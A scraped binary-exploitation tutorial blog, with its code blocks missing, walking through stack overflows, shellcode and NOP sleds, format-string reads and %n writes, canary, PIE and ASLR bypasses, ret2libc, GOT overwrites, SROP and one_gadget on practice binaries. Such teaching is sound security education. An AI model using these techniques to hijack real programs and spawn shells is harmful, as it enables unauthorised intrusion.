Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
The better way to calculate offsets
De Bruijn sequences of order n
is simply a sequence where no string of n
characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.
Again, radare2
comes with a nice command-line tool (called ragg2
) that can generate it for us. Let's create a sequence of length 100
.
The -P
specifies the length while -r
tells it to show ascii bytes rather than hex pairs.
Now we have the pattern, let's just input it in radare2
when prompted for input, make it crash and then calculate how far along the sequence the EIP is. Simples.
The address it crashes on is 0x41534141
; we can use radare2
's in-built wopO
command to work out the offset.
Awesome - we get the correct value!
We can also be lazy and not copy the value.
The backticks means the dr eip
is calculated first, before the wopO
is run on the result of it.
Running your own code
In real exploits, it's not particularly likely that you will have a win()
function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.
Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that Von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.
ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomising certain aspects of memory (we will talk about it in much more detail later). This randomisation can make shellcode exploits like the one we're about to do more less reliable, so we'll be disabling it for now using this.
Again, you should never run commands if you don't know what they do
Let's debug vuln()
using radare2
and work out where in memory the buffer starts; this is where we want to point the return pointer to.
This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets()
and find the exact address.
It appears to be at 0xffffcfd4
; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.
The padding is 312 bytes.
In order for the shellcode to be correct, we're going to set context.binary
to our binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us with working shellcode.
We can use just process()
because once context.binary
is set it is assumed to use that process
Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.
Yup, that's it. Now let's send it off and use p.interactive()
, which enables us to communicate to the shell.
If you're getting an EOFError
, print out the shellcode and try to find it in memory - the stack address may be wrong
And it works! Awesome.
We injected shellcode, a series of assembly instructions, when prompted for input
We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution
The most basic binexp challenge
A ret2win is simply a binary where there is a win()
function (or equivalent); once you successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learnt in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.
To do this, what do we need to know? Well, a couple things:
The padding until we begin to overwrite the return pointer (EIP)
What value we want to overwrite EIP to
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
This can be found using simple trial and error; if we send a variable numbers of characters, we can use the Segmentation Fault
message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.
You may get a segmentation fault for reasons other than overwriting EIP; use a debugger to make sure the padding is correct.
We get an offset of 52 bytes.
Now we need to find the address of the flag()
function in the binary. This is simple.
afl
stands for Analyse Functions List
The flag()
function is at 0x080491c3
.
The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the A
s that we sent became 0x41
- which is the ASCII code of A
. So the solution is simple - let's just find the characters with ascii codes 0x08
, 0x04
, 0x91
and 0xc3
.
This is a lot simpler than you might think, because we can specify them in python as hex:
And that makes it much easier.
Now we know the padding and the value, let's exploit the binary! We can use pwntools
to interface with the binary (check out the pwntools posts for a more in-depth look).
If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put in a pause()
to give us time to attach radare2
onto the process.
Now let's run the script with python3 exploit.py
and then open up a new terminal window.
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe()
and read the value of the return pointer.
0xc3910408
- look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the byte with the largest value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (for a reason), and most binaries you will come across are little-endian. As far as we're concerned, the byte are stored in reverse order in little-endian executables.
radare2
comes with a nice tool called rabin2
for binary analysis:
So our binary is little-endian.
The fix is simple - reverse the address (you can also remove the pause()
)
If you run this now, it will work:
And wham, you've called the flag()
function! Congrats!
Unsurprisingly, you're not the first person to have thought "could they possibly make endianness simpler" - luckily, pwntools has a built-in p32()
function ready for use!
becomes
Much simpler, right?
The only caveat is that it returns bytes
rather than a string, so you have to make the padding a byte string:
Otherwise you will get a
The defence against shellcode
As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralising shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.
The Windows version of NX is DEP, which stands for Data Execution Prevention
You can either use pwntools' checksec
or rabin2
.
The differences between the sizes
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switch out the p32()
for p64()
as the memory addresses are longer.
The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the . Note that different Operating Systems also have different calling conventions.
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. Which makes then very useful for shellcode exploits, because all they will do is run the next instruction. If we pad our exploits on the left with NOPs and point EIP at the middle of them, it'll simply keep doing no instructions until it reaches our actual shellcode. This allows us a greater margin of error as a shift of a few bytes forward or backwards won't really affect it, it'll just run a different number of NOP instructions - which have the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled, since the EIP is essentially sliding down them.
In intel x86 assembly, NOP instructions are \x90
.
The NOP instruction actually used to stand for XCHG EAX, EAX
, which does effectively nothing. You can read a bit more about it .
We can make slight changes to our exploit to do two things:
Add a large number of NOPs on the left
Adjust our return pointer to point at the middle of the NOPs rather than the buffer start
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location my be different.
It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack
Note that NOPs are only \x90
in certain architectures, and if you need others you can use pwntools:
An introduction to binary exploitation
Binary Exploitation is about finding vulnerabilities in programs and utilising them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.
When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.
The binary has two files - source.c
and vuln
; the latter is an ELF
file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).
We're gonna use a tool called radare2
to analyse the behaviour of the binary when functions are called.
The -d
runs it while the -A
performs analysis. We can disassemble main
with
s main
seeks (moves) to main, while pdf
stands for Print Disassembly Function (literally just disassembles it).
The call to unsafe
is at 0x080491bb
, so let's break there.
db
stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply somewhere which, when reached, pauses the program for you to run other commands. Now we run dc
for debug continue; this just carries on running the file.
It should break before unsafe
is called; let's analyse the top of the stack now:
pxw
tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first value here, which is 0xf7efe000
. This value is stored at the top of the stack, as ESP points to the top of the stack - in this case, that is 0xff984af0
.
Note that the value 0xf7efe000
is random - it's an artefact of previous processes that have used that part of the stack. The stack is never wiped, it's just marked as usable, so before data actually gets put there the value is completely dependent on your system.
Let's move one more instruction with ds
, debug step, and check the stack again. This will execute the call sym.unsafe
instruction.
Huh, something's been pushed onto the top of the stack - the value 0x080491c0
. This looks like it's in the binary - but where? Let's look back at the disassembly from before:
We can see that 0x080491c0
is the memory address of the instruction after the call to unsafe
. Why? This is how the program knows where to return to after unsafe()
has finished.
But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe
and break on the ret
instruction; ret
is the equivalent of pop eip
, which will get the saved return pointer we just analysed on the stack into the eip
register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.
Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec
.
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret
, the value popped into eip
won't be in the previous function but rather 0x41414141
. Let's check with ds
.
And look at the new prompt - 0x41414141
. Let's run dr eip
to make sure that's the value in eip
:
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc
.
radare2
is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault
, which could mean a variety of things, but usually that you have overwritten EIP.
Of course, you can prevent people from writing more characters than expected when making your program, usually using other C functions such as fgets()
; gets()
is intrinsically unsafe because it doesn't check the length of the input, meaning that the presence of gets()
is always something you should check out in a program. It is also possible to give fgets()
the wrong parameters, meaning it still takes in too many characters.
When a function calls another function, it
pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again
Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets()
can prevent such easy overflow, but you should check how much is actually being read.
Welcome to my blog! There's a lot here and it's a bit spread out, so here's a guide:
If you're looking for the binary exploitation notes, you're in the right place! Here I make notes on most of the things I learn, and also provide vulnerable binaries to allow you to have a go yourself. Most "common" stack techniques are mentioned along with some super introductory heap; more will come soonâ„¢.
If you're looking for my maths notes, they are split up (with some overlap):
Cryptography-specific maths can be found on GitBook , or by clicking the hyperlink in the header
All my other maths notes can be found on Notion . I realise having it in multiple locations is annoying, but maths support in Notion is just wayyy better. Like so much better. Sorry.
Hopefully these two get moulded into one soon
If you'd like to find me elsewhere, I'm usually down as ir0nstone. The accounts you'd actually be interested in seeing are likely or my (or X, if you really prefer).
If this resource has been helpful to you, please consider :)
And, of course, thanks to GitBook for all of their support :)
~ Andrej Ljubic
A minor issue
A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.
Essentially the x86-64 ABI (application binary interface) guarantees 16-byte alignment on a call
instruction. LIBC takes advantage of this and uses SSE data transfer instructions to optimise execution; system
in particular utilises instructions such as movaps
.
That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 - the ROP chain will fail on system
.
The fix is simple - in your ROP chain, before the call to system
, place a singular ret
gadget:
This works because it will cause RSP to be popped an additional time, pushing it forward by 8 bytes and aligning it.
As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address
will automatically update all the function and symbols addresses for you, meaning you don't have to worry about using readelf
or other command line tools, but instead can receive it all dynamically.
Not to mention that the ROP capabilities are incredibly powerful as well.
Position Independent Code
PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.
Luckily, this does not mean it's impossible to exploit. PIE executables are based around relative rather than absolute addresses, meaning that while the locations in memory are fairly random the offsets between different parts of the binary remain constant. For example, if you know that the function main
is located 0x128
bytes in memory after the base address of the binary, and you somehow find the location of main
, you can simply subtract 0x128
from this to get the base address and from the addresses of everything else.
So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?
The stack of course!
We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value off the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!
Due to the way PIE randomisation works, the base address of a PIE executable will always end in the hexadecimal characters 000
. This is because pages are the things being randomised in memory, which have a standard size of 0x1000
. Operating Systems keep track of page tables which point to each section of memory and define the permissions for each section, similar to segmentation.
Checking the base address ends in 000
should probably be the first thing you do if your exploit is not working as you expected.
The Buffer Overflow defence
Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret
, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.
If they are not, the attacker attempted to overflow to control the return pointer and the program crashes, often with a ***stack smashing detected***
error message.
On Linux, stack canaries end in 00
. This is so that they null-terminate any strings in case you make a mistake when using print functions, but it also makes them much easier to spot.
There are two ways to bypass a canary.
This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.
The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. The format string we can use to leak the canary value, then we can use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check as its value remains constant. And of course, we just have to run win()
.
First let's check there is a canary:
Yup, there is. Now we need to calculate at what offset the canary is at, and to do this we'll use radare2.
The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00
and looks very random, unlike the libc and stack addresses that start with f7
and ff
. If we count the number of address it's around 24 until that value, so we go one before and one after as well to make sure.
It appears to be at %23$p
. Remember, stack canaries are randomised for each new process, so it won't be the same.
Now let's just automate grabbing the canary with pwntools:
Now all that's left is work out what the offset is until the canary, and then the offset from after the canary to the return pointer.
We see the canary is at 0xffea8afc
. A little later on the return pointer (we assume) is at 0xffea8b0c
. Let's break just after the next gets()
and check what value we overwrite it with (we'll use a De Bruijn pattern).
Now we can check the canary and EIP offsets:
Return pointer is 16 bytes after the canary start, so 12 bytes after the canary.
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
Remember, in 64-bit format string goes to the relevant registers first and the addresses can fit 8 bytes each so the offset may be different.
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.
As you can expect, the general idea is to run the process loads and load of times with random canary values until you get a hit, which you can differentiate by the presence of a known plaintext, e.g. flag{
and this can take ages to run and is frankly not a particularly interesting challenge.
Reading memory off the stack
Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.
In C, certain functions can take "format specifier" within strings. Let's look at an example:
This prints out:
So, it replaced %d
with the value, %f
with the float value and %x
with the hex representation.
This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try print out the same value in hex 3 times:
As expected, we get
What happens, however, if we don't have enough arguments for all the format specifiers?
Erm... what happened here?
The key here is that printf
expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.
Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is when C code takes user-provided input and prints it out using printf
.
If we run this normally, it works at expected:
But what happens if we input format string specifieres, such as %x
?
It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.
To print the same value 3 times, using
Gets tedious - so, there is a better way in C.
The 1$
between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p
- instead of sending %p %p %p %p %p %p
we can just do %6$p
. This allows us to be much more efficient.
In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s
format specifier, it's the pointer that gets passed to it. That means instead of reading a value of the stack, you read the value in the memory address it points at.
Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.
Let's look back at the previous program and its output:
You may notice that the last two values contain the hex values of %x
. That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address then point %s
at it, we can get an arbitrary write!
%p
is a pointer; generally, it returns the same as %x
just precedes it with a 0x
which makes it stand out more
As we can see, we're reading the value we inputted. Let's write a quick pwntools script that write the location of the ELF file and reads it with %s
- if all goes well, it should read the first bytes of the file, which is always \x7fELF
. Start with the basics:
Nice it works. The base address of the binary is 0x8048000
, so let's replace the 0x41424344
with that and read it with %s
:
It doesn't work.
The reason it doesn't work is that printf
stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.
Let's break down the payload:
We add 4 |
because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address
The offset is %8$p
because the start of the buffer is generally at %6$p
. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p
.
It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.
Now let's replace the p
with an s
.
Of course, %s
will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01
.
Luckily C contains a rarely-used format specifier %n
. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written an also where we write them.
Obviously, there is a small flaw - to write, say, 0x8048000
to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch this video to completely understand it, but let's jump into a basic binary.
Simple - we need to overwrite the variable auth
with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets
.
As it's a global variable, it's within the binary itself. We can check the location using readelf
to check for symbols.
Location of auth
is 0x0804c028
.
We're lucky there's no null bytes, so there's no need to change the order.
Buffer is the 7th %p
.
And easy peasy:
As you can expect, pwntools has a handy feature for automating %n
format string exploits:
The offset
in this case is 7
because the 7th %p
read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.
You can also grab the location of the auth
symbol with pwntools:
Check out the pwntools tutorials for more cool features
Utilising Calling Conventions
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
Everything after the address of flag()
will be part of the stack frame for the next function as it is expected to be there - just instead of using push
instructions we just overwrote them manually.
Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi
and rsi
as we have two parameters).
We have to fill the registers before the function is called
Using format string
Unlike last time, we don't get given a function. We'll have to leak it with format strings.
Everything's as we expect.
As last time, first we set everything up.
Now we just need a leak. Let's try a few offsets.
3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).
We can see the base address is 0x565ef000
and the leaked value is 0x565f01d5
. Therefore, subtracting 0x1d5
from the leaked address should give us the binary. Let's leak the value and get the base address.
Now we just need to send the exploit payload.
Same deal, just 64-bit. Try it out :)
Address Space Layout Randomisation
ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc
's equivalent of PIE - every time you run a binary, libc
(and other libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as libc
PIE, there is a key difference.
ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE can be compiled into the binary while the presence of ASLR is completely dependant on the environment running the binary. If I sent you a binary compiled with ASLR disabled while I did it, it wouldn't make any different at all if you had ASLR enabled.
Of course, as with PIE, this means you cannot hardcode values such as function address (e.g. system
for a ret2libc).
It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.
When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.
Instead, a more reliable way is reading the .
For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000
.
Hijacking functions
You may remember that the GOT stores the actual locations in libc
of functions. Well, if we could overwrite an entry, we could gain code execution that way. Imagine the following code:
Not only is there a buffer overflow and format string vulnerability here, but say we used that format string to overwrite the GOT entry of printf
with the location of system
. The code would essentially look like the following:
Bit of an issue? Yes. Our input is being passed directly to system
.
Bypassing ASLR
The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binary in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc
, the C standard library) to provide the bulk of the fucntionality.
For example, each ELF file will not carry their own version of puts
compiled within it - it will instead dynamically link to the puts
of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.
Not quite.
The problem with this approach is it requires libc
to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.
When you call puts()
in C and compile it as an ELF executable, it is not actually puts()
- instead, it gets compiled as puts@plt
. Check it out in GDB:
Why does it do that?
Well, as we said, it doesn't know where puts
actually is - so it jumps to the PLT entry of puts
instead. From here, puts@plt
does some very specific things:
If there is a GOT entry for puts
, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc
functions. puts@got
, for example, will contain the address of puts
in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so
(also called the dynamic linker/loader) to get the function address and stores it in the GOT.
Well, there are two key takeaways from the above explanation:
Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc
, and the GOT is within the binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc
function, for example system
, we can just redirect execution to its PLT entry and it will be the equivalent of calling system
directly; no need to jump into libc
.
The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc
function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc
function and therefore bypass ASLR.
There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be return but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.
A ret2plt is a common technique that involves calling puts@plt
and passing the GOT entry of puts as a parameter. This causes puts
to print out its own address in libc
. You then set the return address to the function you are exploiting in order to call it again and enable you to
flat()
packs all the values you give it with p32()
and p64()
(depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time
This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way to complicate future payloads, for example when stack pivoting.
The PLT and GOT do the bulk of static linking
The PLT resolves actual locations in libc
of functions you use and stores them in the GOT
Next time that function is called, it jumps to the GOT and resumes execution there
Calling function@plt
is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc
base
This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.
We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets()
takes in as much data as we want.
All the basic setup
Now we want to send a payload that leaks the real address of puts
. As mentioned before, calling the PLT entry of a function is the same as calling the function itself; if we point the parameter to the GOT entry, it'll print out it's actual location. This is because in C string arguments for functions actually take a pointer to where the string can be found, so pointing it to the GOT entry (which we know the location of) will print it out.
But why is there a main
there? Well, if we set the return address to random jargon, we'll leak libc base but then it'll crash; if we call main
again, however, we essentially restart the binary - except we now know libc
base so this time around we can do a ret2libc.
Remember that the GOT entry won't be the only thing printed - puts
, and most functions in C, print until a null byte. This means it will keep on printing GOT addresses, but the only one we care about is the first one, so we grab the first 4 bytes and use u32()
to interpret them as a little-endian number. After that we ignore the the rest of the values as well as the Come get me
from calling main
again.
From here, we simply calculate libc base again and perform a basic ret2libc:
And bingo, we have a shell!
You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P
The very simplest of possible GOT-overwrite binaries.
Infinite loop which takes in your input and prints it out to you using printf
- no buffer overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)
As per usual, set it all up
Now, to do the %n
overwrite, we need to find the offset until we start reading the buffer.
Looks like it's the 5th.
Yes it is!
Now, next time printf
gets called on your input it'll actually be system
!
If the buffer is restrictive, you can always send /bin/sh
to get you into a shell and run longer commands.
You'll never guess. That's right! You can do this one by yourself.
If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit exploits again; you'll have to leverage what we've covered previously.
Just as we did for PIE, except this time we print the address of system.
Yup, does what we expected.
Your address of system might end in different characters - you just have a different libc version
Much of this is as we did with PIE.
Note that we include the libc here - this is just another ELF
object that makes our lives easier.
Parse the address of system and calculate libc base from that (as we did with PIE):
Now we can finally ret2libc, using the libc
ELF
object to really simplify it for us:
Try it yourself :)
If you prefer, you could have changed the following payload to be more pwntoolsy:
Instead, you could do:
The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.
Shellcode, but without the guesswork
The problem with shellcode exploits as they are is that the locations of it are questionable - wouldn't it be cool if we could control where we wrote it to?
Well, we can.
Instead of writing shellcode directly, we can instead use some ROP to take in input again - except this time, we specify the location as somewhere we control.
If you think about it, once the return pointer is popped off the stack ESP will points at whatever is after it in memory - after all, that's the entire basis of ROP. But what if we put shellcode there?
It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return pointer with a jmp esp
gadget! Once it gets popped off, ESP will point at the shellcode and thanks to the jmp esp
it will be executed!
ret2reg extends the use of jmp esp
to the use of any register that happens to point somewhere you need it to.
Relocation Read-Only
RELRO is a protection to stop any GOT overwrites from taking place, and it does so very effectively. There are two types of RELRO, which are both easy to understand.
Partial RELRO simply moves the GOT above the program's variables, meaning you can't overflow into the GOT. This, of course, does not prevent format string overwrites.
Full RELRO makes the GOT completely read-only, so even format string exploits cannot overwrite it. This is not the default in binaries due to the fact that it can make it take much longer to load as it need to resolve all the function addresses at once.
Interfacing directly with the kernel
A syscall is a system call, and is how the program enters the kernel in order to carry out specific tasks such as creating processes, I/O and any others they would require kernel-level access.
Browsing the list of syscalls, you may notice that certain syscalls are similar to libc functions such as open()
, fork()
or read()
; this is because these functions are simply wrappers around the syscalls, making it much easier for the programmer.
On Linux, a syscall is triggered by the int80
instruction. Once it's called, the kernel checks the value stored in RAX - this is the syscall number, which defines what syscall gets run. As per the table, the other parameters can be stored in RDI, RSI, RDX, etc and every parameter has a different meaning for the different syscalls.
A notable syscall is the execve
syscall, which executes the program passed to it in RDI. RSI and RDX hold arvp
and envp
respectively.
This means, if there is no system()
function, we can use execve
to call /bin/sh
instead - all we have to do is pass in a pointer to /bin/sh
to RDI, and populate RSI and RDX with 0
(this is because both argv
and envp
need to be NULL
to pop a shell).
Controlling all registers at once
A sigreturn is a special type of syscall. The purpose of sigreturn is to return from the signal handler and to clean up the stack frame after a signal has been unblocked.
What this involves is storing all the register values on the stack. Once the signal is unblocked, all the values are popped back in (RSP points to the bottom of the sigreturn frame, this collection of register values).
By leveraging a sigreturn
, we can control all register values at once - amazing! Yet this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a super powerful technique - especially with limited gadgets.
Quick shells and pointers
A one_gadget
is simply an execve("/bin/sh")
command that is present in gLIBC, and this can be a quick win with GOT overwrites - next time the function is called, the one_gadget
is executed and the shell is popped.
__malloc_hook
is a feature in C. The Official GNU site defines __malloc_hook
as:
The value of this variable is a pointer to the function that
malloc
uses whenever it is called.
To summarise, when you call malloc()
the function __malloc_hook
points to also gets called - so if we can overwrite this with, say, a one_gadget
, and somehow trigger a call to malloc()
, we can get an easy shell.
Luckily there is a tool written in Ruby called one_gadget
. To install it, run:
And then you can simply run
For most one_gadgets, certain criteria have to be met. This means they won't all work - in fact, none of them may work.
Wait a sec - isn't malloc()
a heap function? How will we use it on the stack? Well, you can actually trigger malloc
by calling printf("%10000$c")
(this allocates too many bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you have a format string vulnerability, calling malloc is trivial.
This is a hard technique to give you practise on, due to the fact that your libc
version may not even have working one_gadgets
. As such, feel free to play around with the GOT overwrite binary and see if you can get a one_gadget
working.
Remember, the value given by the one_gadget
tool needs to be added to libc base as it's just an offset.
Any function that returns a pointer to the string once it acts on it is a prime target. There are many that do this, including stuff like gets()
, strcpy()
and fgets()
. We''l keep it simple and use gets()
as an example.
First, let's make sure that some register does point to the buffer:
Now we'll set a breakpoint on the ret
in vuln()
, continue and enter text.
We've hit the breakpoint, let's check if RAX points to our register. We'll assume RAX first because that's the traditional register to use for the return value.
And indeed it does!
We now just need a jmp rax
gadget or equivalent. I'll use ROPgadget for this and look for either jmp rax
or call rax
:
There's a jmp rax
at 0x40109c
, so I'll use that. The padding up until RIP is 120
; I assume you can calculate this yourselves by now, so I won't bother showing it.
Awesome!
Super standard binary.
Let's get all the basic setup done.
Now we're going to do something interesting - we are going to call gets
again. Most importantly, we will tell gets
